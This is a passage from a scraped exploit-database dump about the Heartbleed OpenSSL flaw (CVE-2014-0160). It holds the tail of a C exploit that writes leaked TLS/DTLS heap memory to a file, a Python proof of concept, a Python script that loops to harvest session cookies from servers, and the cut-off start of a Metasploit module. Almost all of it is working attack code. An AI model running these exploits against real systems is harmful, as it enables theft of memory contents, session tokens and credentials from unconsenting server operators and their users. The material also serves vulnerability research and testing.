\nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \ndtls1_record_bitmap_update(s, &(s->d1->bitmap)); \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \n \ndtls1_stop_timer(c->sslHandle); \nc->sslHandle->tlsext_hb_seq++; \nc->sslHandle->tlsext_hb_pending = 0; \n \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \nstatic DTLS1_BITMAP * \ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch) \n{ \n \n*is_next_epoch = 0; \n \nif (rr->epoch == s->d1->r_epoch) \nreturn &s->d1->bitmap; \n \nelse if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) && \n(rr->type == SSL3_RT_HANDSHAKE || \nrr->type == SSL3_RT_ALERT)) \n{ \n*is_next_epoch = 1; \nreturn &s->d1->next_bitmap; \n} \n \nreturn NULL; \n} \n \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \nshift = -cmp; \nif (shift >= sizeof(bitmap->map)*8) \nreturn 0; \nelse if (bitmap->map & (1UL<<shift)) \nreturn 0; \n \nmemcpy (s->s3->rrec.seq_num,seq,8); \nreturn 1; \n} \n \nint satsub64be(const unsigned char *v1,const unsigned char *v2) \n{ int ret,sat,brw,i; \n \nif (sizeof(long) == 8) do \n{ const union { long one; char little; } is_endian = {1}; \nlong l; \n \nif (is_endian.little) break; \n \nif (((size_t)v1|(size_t)v2)&0x7) break; \n \nl = *((long *)v1); \nl -= *((long *)v2); \nif (l>128) return 128; \nelse if (l<-128) return -128; \nelse return (int)l; \n} while (0); \n \nret = (int)v1[7]-(int)v2[7]; \nsat = 0; \nbrw = ret>>8; \nif (ret & 0x80) \n{ for (i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= ~brw; \nbrw >>= 8; \n} \n} \nelse \n{ for (i=6;i>=0;i--) \n{ brw += (int)v1[i]-(int)v2[i]; \nsat |= brw; \nbrw >>= 8; \n} \n} \nbrw <<= 8; \n \nif (sat&0xff) return brw | 0x80; \nelse return brw + (ret&0xFF); \n} \n \nstatic int \ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority) \n{ \nDTLS1_RECORD_DATA *rdata; \npitem *item; \n \nif (pqueue_size(queue->q) >= 100) \nreturn 0; \n \nrdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA)); \nitem = pitem_new(priority, rdata); \nif (rdata == NULL || item == NULL) \n{ \nif (rdata != NULL) OPENSSL_free(rdata); \nif (item != NULL) pitem_free(item); \n \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nreturn(0); \n} \n \nrdata->packet = s->packet; \nrdata->packet_length = s->packet_length; \nmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER)); \nmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD)); \n \nitem->data = rdata; \n \n#ifndef OPENSSL_NO_SCTP \nif (BIO_dgram_is_sctp(SSL_get_rbio(s)) && \n(s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) { \nBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo); \n} \n#endif \n \nif (pqueue_insert(queue->q, item) == NULL) \n{ \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \ns->packet = NULL; \ns->packet_length = 0; \nmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER)); \nmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD)); \n \nif (!ssl3_setup_buffers(s)) \n{ \nSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR); \nOPENSSL_free(rdata); \npitem_free(item); \nreturn(0); \n} \n \nreturn(1); \n} \n \n \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap) \n{ \nint cmp; \nunsigned int shift; \nconst unsigned char *seq = s->s3->read_sequence; \n \ncmp = satsub64be(seq,bitmap->max_seq_num); \nif (cmp > 0) \n{ \nshift = cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map <<= shift, bitmap->map |= 1UL; \nelse \nbitmap->map = 1UL; \nmemcpy(bitmap->max_seq_num,seq,8); \n} \nelse { \nshift = -cmp; \nif (shift < sizeof(bitmap->map)*8) \nbitmap->map |= 1UL<<shift; \n} \n} \n \n \nvoid usage(){ \nprintf(\"[\\n\"); \nprintf(\"[ --server|-s <ip/dns> - the server to target\\n\"); \nprintf(\"[ --port|-p <port> - the port to target\\n\"); \nprintf(\"[ --file|-f <filename> - file to write data to\\n\"); \nprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\"); \nprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\"); \nprintf(\"[ 0 = SMTP\\n\"); \nprintf(\"[ 1 = POP3\\n\"); \nprintf(\"[ 2 = IMAP\\n\"); \nprintf(\"[ --loop|-l - loop the exploit attempts\\n\"); \nprintf(\"[ --type|-t <n> - select exploit to try\\n\"); \nprintf(\"[ 0 = null length\\n\"); \nprintf(\"[ 1 = max leak\\n\"); \nprintf(\"[ n = heartbeat payload_length\\n\"); \nprintf(\"[ --udp|-u - use dtls/udp\\n\"); \nprintf(\"[\\n\"); \nprintf(\"[ --verbose|-v - output leak to screen\\n\"); \nprintf(\"[ --help|-h - this output\\n\"); \nprintf(\"[\\n\"); \nexit(0); \n} \n \nint main(int argc, char* argv[]){ \nint ret, port, userc, index; \nint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; \nint loop = 0; \nstruct hostent *h; \nconnection* c; \nchar *host, *file; \nint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; \nprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\"); \nprintf(\"[ =============================================================\\n\"); \nstatic struct option options[] = { \n{\"server\", 1, 0, 's'}, \n{\"port\", 1, 0, 'p'}, \n{\"file\", 1, 0, 'f'}, \n{\"type\", 1, 0, 't'}, \n{\"bind\", 1, 0, 'b'}, \n{\"verbose\", 0, 0, 'v'}, \n{\"precmd\", 1, 0, 'c'}, \n{\"loop\", 0, 0, 'l'}, \n{\"help\", 0, 0,'h'}, \n{\"udp\", 0, 0, 'u'} \n}; \nwhile(userc != -1) { \nuserc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \nswitch(userc) { \ncase -1: \nbreak; \ncase 's': \nif(ihost==0){ \nihost = 1; \nh = gethostbyname(optarg); \nif(h==NULL){ \nprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg); \nexit(1); \n} \nhost = malloc(strlen(optarg) + 1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \n} \nbreak; \ncase 'p': \nif(iport==0){ \nport = atoi(optarg); \niport = 1; \n} \nbreak; \ncase 'f': \nif(ifile==0){ \nfile = malloc(strlen(optarg) + 1); \nif(file==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(file,\"%s\",optarg); \nifile = 1; \n} \nbreak; \ncase 't': \nif(itype==0){ \ntype = atoi(optarg); \nitype = 1; \n} \nbreak; \ncase 'h': \nusage(); \nbreak; \ncase 'b': \nif(ihost==0){ \nihost = 1; \nhost = malloc(strlen(optarg)+1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \nbind = 1; \n} \nbreak; \ncase 'c': \nif(iprecmd == 0){ \niprecmd = 1; \nprecmd = atoi(optarg); \n} \nbreak; \ncase 'v': \nverbose = 1; \nbreak; \ncase 'l': \nloop = 1; \nbreak; \ncase 'u': \nudp = 1; \nbreak; \n \ndefault: \nbreak; \n} \n} \nif(ihost==0||iport==0||ifile==0||itype==0){ \nprintf(\"[ try --help\\n\"); \nexit(0); \n} \nssl_init(); \nif(bind==0){ \nif (udp){ \nc = dtls_client(ret, host, port); \ndtlsheartbleed(c, type); \ndtlssneakyleaky(c,file,verbose); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \nelse { \nret = tcp_connect(host, port); \npre_cmd(ret, precmd, verbose); \nc = tls_connect(ret); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \n} \n \nSSL_shutdown(c->sslHandle); \nclose (ret); \nSSL_free(c->sslHandle); \n} \nelse{ \nint sd, pid, i; \nif (udp) { \nc = dtls_server(sd, host, port); \nwhile (1) { \nchar * bytes = malloc(1024); \nstruct sockaddr_in peer; \nsocklen_t len = sizeof(peer); \nif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) { \ndtlsheartbleed(c,type); \ndtlssneakyleaky(c,file,verbose); \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \ndtlsheartbleed(c,type); \nwhile(repeat==1){ \ndtlssneakyleaky(c,file,verbose); \n} \n} \n} \n} \n} \nelse { \nret = tcp_bind(host, port); \nwhile(1){ \nsd=accept(ret,0,0); \nif(sd==-1){ \nprintf(\"[!] FATAL: problem with accept()\\n\"); \nexit(0); \n} \nif(pid=fork()){ \nclose(sd); \n} \nelse{ \nc = tls_bind(sd); \npre_cmd(ret, precmd, verbose); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \n} \n} \n} \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126308/heartbleeddtls-leak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:16:50", "references": [], "edition": 1, "description": "", "reporter": "Jared Stafford", "published": "2014-04-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "id": "PACKETSTORM:126070", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:28", "references": [], "edition": 1, "description": "", "reporter": "Michael Davis", "published": "2014-04-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "Heartbleed User Session Extraction", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "id": "PACKETSTORM:126069", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. \n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. \n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. \n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:22:30", "references": [], "edition": 1, "description": "", "reporter": "Neel Mehta", "published": "2014-04-10T00:00:00", "type": "packetstorm", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "href": "https://packetstormsecurity.com/files/126101/OpenSSL-Heartbeat-Heartbleed-Information-Leak.html", "id": "PACKETSTORM:126101", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \nCIPHER_SUITES = [ \n0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA \n0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA \n0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA \n0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA \n0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA \n0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA \n0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA \n0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA \n0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA \n0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA \n0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA \n0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA \n0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA \n0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA \n0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA \n0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA \n0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA \n0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA \n0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA \n0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA \n0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA \n0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA \n0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA \n0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA \n0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA \n0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA \n0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA \n0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA \n0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA \n0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA \n0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA \n0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA \n0x0096, # TLS_RSA_WITH_SEED_CBC_SHA \n0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA \n0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA \n0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA \n0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA \n0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA \n0x0005, # TLS_RSA_WITH_RC4_128_SHA \n0x0004, # TLS_RSA_WITH_RC4_128_MD5 \n0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA \n0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA \n0x0009, # TLS_RSA_WITH_DES_CBC_SHA \n0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA \n0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 \n0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5 \n0x00ff # Unknown \n] \n \nHANDSHAKE_RECORD_TYPE = 0x16 \nHEARTBEAT_RECORD_TYPE = 0x18 \nALERT_RECORD_TYPE = 0x15 \nTLS_VERSION = { \n'1.0' => 0x0301, \n'1.1' => 0x0302, \n'1.2' => 0x0303 \n} \n \nTTLS_CALLBACKS = { \n'SMTP' => :tls_smtp, \n'IMAP' => :tls_imap, \n'JABBER' => :tls_jabber, \n'POP3' => :tls_pop3 \n} \n \ndef initialize \nsuper( \n'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak', \n'Description' => %q{ \nThis module implements the OpenSSL Heartbleed attack. The problem \nexists in the handling of heartbeat requests, where a fake length can \nbe used to leak memory data in the response. Services that support \nSTARTTLS may also be vulnerable. \n}, \n'Author' => [ \n'Neel Mehta', # Vulnerability discovery \n'Riku', # Vulnerability discovery \n'Antti', # Vulnerability discovery \n'Matti', # Vulnerability discovery \n'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it. \n'FiloSottile', # PoC site and tool \n'Christian Mehlmauer', # Msf module \n'wvu', # Msf module \n'juan vazquez' # Msf module \n], \n'References' => \n[ \n['CVE', '2014-0160'], \n['US-CERT-VU', '720951'], \n['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'], \n['URL', 'http://heartbleed.com/'], \n['URL', 'https://github.com/FiloSottile/Heartbleed'], \n['URL', 'https://gist.github.com/takeshixx/10107280'], \n['URL', 'http://filippo.io/Heartbleed/'] \n], \n'DisclosureDate' => 'Apr 7 2014', \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]), \nOptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber 